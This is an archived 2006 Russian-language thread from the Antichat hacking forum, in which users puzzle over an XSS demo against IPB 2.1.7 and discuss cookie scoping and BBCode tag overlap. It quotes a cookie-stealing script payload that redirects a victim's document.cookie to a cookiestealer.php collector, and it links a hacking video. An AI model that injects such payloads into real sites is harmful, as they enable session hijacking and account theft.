Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)
-   -   xss без документ.куи? (https://forum.antichat.xyz/showthread.php?t=24854)

gemaglabin 04.10.2006 07:43

xss без документ.куи?
 
Недавно на одном из зарубежных порталов скачал видео по демонстрации xss на ipb 2.1.7

Код темы форума хекера был такой

Код:

[урлl=http://путь к гиф файлу][имг]просто картинка][/имг]
Gif файл

Код:

<SCRIPT>location.href='http://127.0.0.1/cookiestealer.php?cookie='+escape(document.cookie)</SCRIPT>
После обращения к линку у хекеря в логах осталась его сессия.Как такое возможно,если в линке в теме топика не передается документ.куки а те куки что уже в гиф файле будут куки не с форума?

Попробовал на локалхосте,естествено,нуле вой результат ;))

Кому интересно могу даю линк на видео,но в отличие от нас,у них размеры видео начиная с 30 мегов и выше ;)

http://rapidshare.de/files/33563512/Video_4_Hacking-Truths.NeT.rar.html

Ну ведь бред да?

hidden 04.10.2006 09:03

Ты серьёзно или это прикол?
Если серьёзно, тогда сколькие из них повелись на это?
Ещё-бы куки не записались, стилер с форумом и картинкой на одном хосте(127.0.0.1).

gemaglabin 04.10.2006 13:20

hidden это был как пример дан.его кукистилер и форум были на разных хостах.

ZaCo 04.10.2006 16:14

2gemaglabin у куксов есть необходимое для этого поле - хост)

Pochka 04.10.2006 18:25

хыхыхыхых, эх гема-Гема =)

gemaglabin 04.10.2006 18:28

Я перепутал,gifка лежала на сервере с форумом.Какой тогда смысл? ;) closed

Xex 04.10.2006 23:32

[урлl=http://путь к гиф файлу][имг]просто картинка][/имг]
тут тег урл не закрыт,
может на основе "перекрытия" тегов че было, а в гифке код скорее всего куда нить подключается, либо это чейто шутка...посмотри видео еще раз внимательно,
30метров качать не тема


Время: 10:00